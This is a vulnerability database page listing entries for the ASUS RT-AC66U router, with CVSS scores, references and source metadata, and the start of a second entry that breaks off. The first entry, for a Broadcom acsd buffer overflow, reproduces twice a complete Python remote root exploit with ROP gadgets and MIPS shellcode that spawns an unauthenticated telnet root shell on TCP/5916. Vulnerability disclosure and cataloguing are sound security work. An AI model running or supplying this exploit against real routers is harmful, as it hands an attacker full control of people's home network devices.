Search

Find a vulnerability

Search criteria

    20 vulnerabilities found for rt-ac66u by asus

    VAR-201703-0032

    Vulnerability from variot - Updated: 2025-04-21 23:37

    Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including ASUS RT-AC66U and TRENDnet TEW-812DRU. The ASUS RT-AC66U is a dual-band wireless router. ASUS RT-AC66U Broadcom acsd Wireless Channel Service (Wireless Channel Servic) has multiple buffer overflow vulnerabilities that allow remote attackers to exploit a vulnerability to submit a malicious request to stop the device from responding or possibly execute arbitrary code. ASUS RT-AC66U is prone to multiple buffer-overflow vulnerabilities. Failed exploit attempts will likely result in denial-of-service conditions. The former is produced by ASUS, and the latter is produced by TRENDnet in the United States. Broadcom ACSD is one of the wireless channel service components. A buffer overflow vulnerability exists in the Broadcom ACSD component used in the ASUS RT-AC66U and TRENDnet TEW-812DRU. #!/usr/bin/env python

    import signal, struct from time import sleep from socket import * from sys import exit, exc_info

    Title***ASUS RT-AC66U Remote Root Shell Exploit - acsd param command

    Discovered and Reported*June 2013

    Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson

    *Security Analsyts @ Independent Security Evaluators

    Software Vendor***http://asus.com

    Exploit/Advisory**http://securityevaluators.com, http://infosec42.blogspot.com/

    Software****acsd wireless service (Listens on TCP/5916)

    Firmware Version**3.0.0.4.266 (Other versions were not tested and may be vulnerable)

    CVE***ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659

    Overview:

    The ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple

    Buffer Overflow attacks.

    Multiple overflows exist in the following software:

    - Broadcom acsd - Wireless Channel Service (autochannel&param, autochannel&data, csscan&ifname commands)

    def sigHandle(signum, frm): # Signal handler

    print "\n[!!!] Cleaning up the exploit... [!!!]\n"
    sleep(1)
    exit(0)
    

    def targServer():

    while True:    
        try:
            server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\n\n>"))
            server = inet_ntoa(server)
            break
        except:
            print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n"
            sleep(1)
            continue
    
    return server
    

    def main():

    print ("""\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
    

    [] Discovered and Reported: June 2013 [] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE [] Software Vendor: http://asus.com [] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/ [] Software: acsd wireless service (Listens on TCP/5916) [] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable) [*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\n""") signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c victim = targServer() port = int(5916) acsdCmd = "autochannel&param=" #Vulnerable command - JH

    # base address of .text section of libc.so.0 in acsd's address space
    libc_base = 0x2ab25000
    
    # ROP gadget #1
    # lui     s0,0x2
    # li      a0,1
    # move    t9,s1
    # jalr    t9
    # ori     a1,s0,0x2
    ra1 = struct.pack("<L", libc_base + 0x2d39c)
    
    # ROP gadget #2
    # move    t9,s3
    # lw      ra,44(sp)
    # lw      s4,40(sp)
    # lw      s3,36(sp)
    # lw      s2,32(sp)
    # lw      s1,28(sp)
    # lw      s0,24(sp)
    # jr      t9
    s1 = struct.pack("<L", libc_base + 0x34358)
    
    # sleep() - used to force program context switch (cache flush)
    s3 = struct.pack("<L", libc_base + 0x2cb90)
    
    # ROP gadget #3
    # addiu   a1,sp,24
    # lw      gp,16(sp)
    # lw      ra,32(sp)
    # jr      ra
    # addiu   sp,sp,40
    ra2 = struct.pack("<L", libc_base + 0xa1b0)
    
    # ROP gadget #4
    # move    t9,a1
    # addiu   a0,a0,56
    # jr      t9
    # move    a1,a2
    ra3 = struct.pack("<L", libc_base + 0x3167c)
    
    # jalr sp
    jalr_sp =  "\x09\xf8\xa0\x03"
    
    JuNk = "\x42" * 510
    safeNop = "2Aa3"
    
    #80 Bytes system() Shellcode by Jacob Holcomb of ISE
    #Calling system() and executing telnetd -l /bin/sh
    shellcode = "\x6c\x6e\x08\x3c\x74\x65\x08\x35\xec\xff\xa8"
    shellcode += "\xaf\x64\x20\x09\x3c\x65\x74\x29\x35\xf0\xff"
    shellcode += "\xa9\xaf\x20\x2f\x0a\x3c\x2d\x6c\x4a\x35\xf4"
    shellcode += "\xff\xaa\xaf\x6e\x2f\x0b\x3c\x62\x69\x6b\x35"
    shellcode += "\xf8\xff\xab\xaf\x73\x68\x0c\x24\xfc\xff\xac"
    shellcode += "\xaf\xec\xff\xa4\x23\xec\xff\xbd\x23\xb4\x2a"
    shellcode += "\x19\x3c\x50\xf0\x39\x37\x09\xf8\x20\x03\x32"
    shellcode += "\x41\x61\x33"
    
    sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48]
    sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4]
    sploit += safeNop + shellcode
    
    try:
        print "\n [*] Creating network socket."
        net_sock = socket(AF_INET, SOCK_STREAM)
    except:
        print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info()       
        sleep(1)
        exit(0)
    
    try:
        print " [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d." % (victim, port)
        net_sock.connect((victim, port))
    except:
        print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info())
        sleep(1)
        exit(0)
    
    try:
        print """ [*] Attempting to exploit the acsd param command.
    

    [] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d. [] Payload Length: %d bytes.""" % (victim, port, len(sploit)) net_sock.send(sploit) sleep(1) except: print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info()) sleep(1) exit(0)

    try:
        print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
    

    [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n""" net_sock.close() except: print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info() sleep(1) exit(0)

    if name == "main": main()

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": null
          },
          {
            "_id": null,
            "model": "tew-812dru",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "trendnet",
            "version": null
          },
          {
            "_id": null,
            "model": "rt-ac66u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "_id": null,
            "model": "tew-812dru",
            "scope": null,
            "trust": 0.8,
            "vendor": "trendnet",
            "version": null
          },
          {
            "_id": null,
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.266"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-11043"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006764"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-627"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-4659"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:trendnet:tew-812dru_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006764"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Jacob Holcomb/Gimppy and Jacob Thompson",
        "sources": [
          {
            "db": "BID",
            "id": "61499"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-627"
          }
        ],
        "trust": 0.9
      },
      "cve": "CVE-2013-4659",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2013-4659",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2013-11043",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-64661",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2013-4659",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2013-4659",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2013-4659",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2013-11043",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201307-627",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-64661",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2013-4659",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-11043"
          },
          {
            "db": "VULHUB",
            "id": "VHN-64661"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-4659"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006764"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-627"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-4659"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including ASUS RT-AC66U and TRENDnet TEW-812DRU. The ASUS RT-AC66U is a dual-band wireless router. ASUS RT-AC66U Broadcom acsd Wireless Channel Service (Wireless Channel Servic) has multiple buffer overflow vulnerabilities that allow remote attackers to exploit a vulnerability to submit a malicious request to stop the device from responding or possibly execute arbitrary code. ASUS RT-AC66U is prone to multiple buffer-overflow vulnerabilities. Failed exploit attempts will likely result in   denial-of-service conditions. The former is produced by ASUS, and the latter is produced by TRENDnet in the United States. Broadcom ACSD is one of the wireless channel service components. A buffer overflow vulnerability exists in the Broadcom ACSD component used in the ASUS RT-AC66U and TRENDnet TEW-812DRU. #!/usr/bin/env python\n\nimport signal, struct\nfrom time import sleep\nfrom socket import *\nfrom sys import exit, exc_info\n\n#\n# Title*******************ASUS RT-AC66U Remote Root Shell Exploit - acsd param command\n# Discovered and Reported*June 2013 \n# Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson\n#                        *Security Analsyts @ Independent Security Evaluators\n# Software Vendor*********http://asus.com\n# Exploit/Advisory********http://securityevaluators.com, http://infosec42.blogspot.com/\n# Software****************acsd wireless service (Listens on TCP/5916)\n# Firmware Version********3.0.0.4.266 (Other versions were not tested and may be vulnerable) \n# CVE*********************ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659\n#\n# Overview:\n#\tThe ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple \n#   Buffer Overflow attacks. \n#\n#   Multiple overflows exist in the following software:\n#\n#\t- Broadcom acsd - Wireless Channel Service (autochannel\u0026param, autochannel\u0026data, csscan\u0026ifname commands)\n#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\n\ndef sigHandle(signum, frm): # Signal handler\n    \n    print \"\\n[!!!] Cleaning up the exploit... [!!!]\\n\"\n    sleep(1)\n    exit(0)\n\n\ndef targServer():\n    \n    while True:    \n        try:\n            server = inet_aton(raw_input(\"\\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\\n\\n\u003e\"))\n            server = inet_ntoa(server)\n            break\n        except:\n            print \"\\n\\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\\n\\n\"\n            sleep(1)\n            continue\n            \n    return server   \n\n\ndef main():\n      \n    print (\"\"\"\\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command\n [*] Discovered and Reported: June 2013\n [*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE\n [*] Software Vendor: http://asus.com\n [*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/\n [*] Software: acsd wireless service (Listens on TCP/5916)\n [*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable)\n [*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\\n\"\"\")\n    signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c\n    victim = targServer()\n    port = int(5916)\n    acsdCmd = \"autochannel\u0026param=\" #Vulnerable command - JH\n    \n    # base address of .text section of libc.so.0 in acsd\u0027s address space\n    libc_base = 0x2ab25000\n\n    # ROP gadget #1\n    # lui     s0,0x2\n    # li      a0,1\n    # move    t9,s1\n    # jalr    t9\n    # ori     a1,s0,0x2\n    ra1 = struct.pack(\"\u003cL\", libc_base + 0x2d39c)\n\n    # ROP gadget #2\n    # move    t9,s3\n    # lw      ra,44(sp)\n    # lw      s4,40(sp)\n    # lw      s3,36(sp)\n    # lw      s2,32(sp)\n    # lw      s1,28(sp)\n    # lw      s0,24(sp)\n    # jr      t9\n    s1 = struct.pack(\"\u003cL\", libc_base + 0x34358)\n\n    # sleep() - used to force program context switch (cache flush)\n    s3 = struct.pack(\"\u003cL\", libc_base + 0x2cb90)\n\n    # ROP gadget #3\n    # addiu   a1,sp,24\n    # lw      gp,16(sp)\n    # lw      ra,32(sp)\n    # jr      ra\n    # addiu   sp,sp,40\n    ra2 = struct.pack(\"\u003cL\", libc_base + 0xa1b0)\n\n    # ROP gadget #4\n    # move    t9,a1\n    # addiu   a0,a0,56\n    # jr      t9\n    # move    a1,a2\n    ra3 = struct.pack(\"\u003cL\", libc_base + 0x3167c)\n\n    # jalr sp\n    jalr_sp =  \"\\x09\\xf8\\xa0\\x03\"\n    \n    JuNk = \"\\x42\" * 510\n    safeNop = \"2Aa3\"\n\n    #80 Bytes system() Shellcode by Jacob Holcomb of ISE\n    #Calling system() and executing telnetd -l /bin/sh\n    shellcode = \"\\x6c\\x6e\\x08\\x3c\\x74\\x65\\x08\\x35\\xec\\xff\\xa8\"\n    shellcode += \"\\xaf\\x64\\x20\\x09\\x3c\\x65\\x74\\x29\\x35\\xf0\\xff\"\n    shellcode += \"\\xa9\\xaf\\x20\\x2f\\x0a\\x3c\\x2d\\x6c\\x4a\\x35\\xf4\"\n    shellcode += \"\\xff\\xaa\\xaf\\x6e\\x2f\\x0b\\x3c\\x62\\x69\\x6b\\x35\"\n    shellcode += \"\\xf8\\xff\\xab\\xaf\\x73\\x68\\x0c\\x24\\xfc\\xff\\xac\"\n    shellcode += \"\\xaf\\xec\\xff\\xa4\\x23\\xec\\xff\\xbd\\x23\\xb4\\x2a\"\n    shellcode += \"\\x19\\x3c\\x50\\xf0\\x39\\x37\\x09\\xf8\\x20\\x03\\x32\"\n    shellcode += \"\\x41\\x61\\x33\"\n\n    sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48]\n    sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4]\n    sploit += safeNop + shellcode\n\n    try:\n        print \"\\n [*] Creating network socket.\"\n        net_sock = socket(AF_INET, SOCK_STREAM)\n    except:\n        print \"\\n [!!!] There was an error creating the network socket. [!!!]\\n\\n%s\\n\" % exc_info()       \n        sleep(1)\n        exit(0)    \n\n    try:\n        print \" [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d.\" % (victim, port)\n        net_sock.connect((victim, port))\n    except:\n        print \"\\n [!!!] There was an error connecting to %s. [!!!]\\n\\n%s\\n\" % (victim, exc_info())\n        sleep(1)\n        exit(0)\n \n    try:\n        print \"\"\" [*] Attempting to exploit the acsd param command. \n [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d. \n [*] Payload Length: %d bytes.\"\"\" % (victim, port, len(sploit))\n        net_sock.send(sploit)\n        sleep(1)\n    except:\n        print \"\\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\\n\\n%s\\n\" % (victim, exc_info())\n        sleep(1)\n        exit(0)\n\n    try:\n        print \"\"\" [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!\n [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\\n\"\"\"\n        net_sock.close()\n    except:\n        print \"\\n [!!!] There was an error closing the network socket. [!!!]\\n\\n%s\\n\" % exc_info()\n        sleep(1)\n        exit(0)\n\n\nif __name__ == \"__main__\":\n    main()\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-4659"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006764"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2013-11043"
          },
          {
            "db": "BID",
            "id": "61499"
          },
          {
            "db": "VULHUB",
            "id": "VHN-64661"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-4659"
          },
          {
            "db": "PACKETSTORM",
            "id": "122562"
          }
        ],
        "trust": 2.7
      },
      "exploit_availability": {
        "_id": null,
        "data": [
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=27133",
            "trust": 0.2,
            "type": "exploit"
          },
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-64661",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-64661"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-4659"
          }
        ]
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2013-4659",
            "trust": 3.6
          },
          {
            "db": "PACKETSTORM",
            "id": "122562",
            "trust": 2.7
          },
          {
            "db": "BID",
            "id": "61499",
            "trust": 1.6
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006764",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-627",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2013-11043",
            "trust": 0.6
          },
          {
            "db": "NSFOCUS",
            "id": "24219",
            "trust": 0.6
          },
          {
            "db": "EXPLOIT-DB",
            "id": "27133",
            "trust": 0.2
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-80751",
            "trust": 0.1
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-80752",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-64661",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-4659",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-11043"
          },
          {
            "db": "VULHUB",
            "id": "VHN-64661"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-4659"
          },
          {
            "db": "BID",
            "id": "61499"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006764"
          },
          {
            "db": "PACKETSTORM",
            "id": "122562"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-627"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-4659"
          }
        ]
      },
      "id": "VAR-201703-0032",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-11043"
          },
          {
            "db": "VULHUB",
            "id": "VHN-64661"
          }
        ],
        "trust": 1.1829994849999999
      },
      "iot_taxonomy": {
        "_id": null,
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-11043"
          }
        ]
      },
      "last_update_date": "2025-04-21T23:37:22.585000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.asus.com/jp/"
          },
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.trendnet.com/home"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006764"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-64661"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006764"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-4659"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 2.6,
            "url": "http://www.linux-magazine.com/issues/2014/161/security-and-soho-routers"
          },
          {
            "trust": 2.6,
            "url": "https://packetstormsecurity.com/files/122562/asus-rt-ac66u-acsd-remote-root-buffer-overflow.html"
          },
          {
            "trust": 0.9,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4659"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4659"
          },
          {
            "trust": 0.6,
            "url": "http://1337day.com/exploit/21033"
          },
          {
            "trust": 0.6,
            "url": "http://www.securityfocus.com/bid/61499"
          },
          {
            "trust": 0.6,
            "url": "http://www.nsfocus.net/vulndb/24219"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/119.html"
          },
          {
            "trust": 0.1,
            "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=33445"
          },
          {
            "trust": 0.1,
            "url": "https://www.exploit-db.com/exploits/27133/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "http://asus.com"
          },
          {
            "trust": 0.1,
            "url": "http://securityevaluators.com,"
          },
          {
            "trust": 0.1,
            "url": "http://infosec42.blogspot.com/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-11043"
          },
          {
            "db": "VULHUB",
            "id": "VHN-64661"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-4659"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006764"
          },
          {
            "db": "PACKETSTORM",
            "id": "122562"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-627"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-4659"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-11043",
            "ident": null
          },
          {
            "db": "VULHUB",
            "id": "VHN-64661",
            "ident": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-4659",
            "ident": null
          },
          {
            "db": "BID",
            "id": "61499",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006764",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "122562",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-627",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2013-4659",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2013-08-01T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2013-11043",
            "ident": null
          },
          {
            "date": "2017-03-14T00:00:00",
            "db": "VULHUB",
            "id": "VHN-64661",
            "ident": null
          },
          {
            "date": "2017-03-14T00:00:00",
            "db": "VULMON",
            "id": "CVE-2013-4659",
            "ident": null
          },
          {
            "date": "2013-07-29T00:00:00",
            "db": "BID",
            "id": "61499",
            "ident": null
          },
          {
            "date": "2017-04-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-006764",
            "ident": null
          },
          {
            "date": "2013-07-26T20:22:22",
            "db": "PACKETSTORM",
            "id": "122562",
            "ident": null
          },
          {
            "date": "2013-07-29T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201307-627",
            "ident": null
          },
          {
            "date": "2017-03-14T09:59:00.160000",
            "db": "NVD",
            "id": "CVE-2013-4659",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2013-08-01T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2013-11043",
            "ident": null
          },
          {
            "date": "2017-03-15T00:00:00",
            "db": "VULHUB",
            "id": "VHN-64661",
            "ident": null
          },
          {
            "date": "2017-03-15T00:00:00",
            "db": "VULMON",
            "id": "CVE-2013-4659",
            "ident": null
          },
          {
            "date": "2013-07-31T12:25:00",
            "db": "BID",
            "id": "61499",
            "ident": null
          },
          {
            "date": "2017-04-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-006764",
            "ident": null
          },
          {
            "date": "2017-03-15T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201307-627",
            "ident": null
          },
          {
            "date": "2025-04-20T01:37:25.860000",
            "db": "NVD",
            "id": "CVE-2013-4659",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "122562"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-627"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "_id": null,
        "data": "ASUS RT-AC66U and  TRENDnet TEW-812DRU Used by multiple vendor routers including  Broadcom ACSD Vulnerable to buffer overflow",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006764"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "buffer overflow",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201307-627"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201707-0387

    Vulnerability from variot - Updated: 2025-04-20 23:36

    Global buffer overflow in networkmap in Asuswrt-Merlin firmware for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to write shellcode at any address in the heap; this can be used to execute arbitrary code on the router by hosting a crafted device description XML document at a URL specified within a Location header in an SSDP response. ASUSRT-AC5300 and others are wireless routers from ASUS. A networkmap is one of the network diagram components. A buffer overflow vulnerability exists in networkmaps in several ASUS products

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
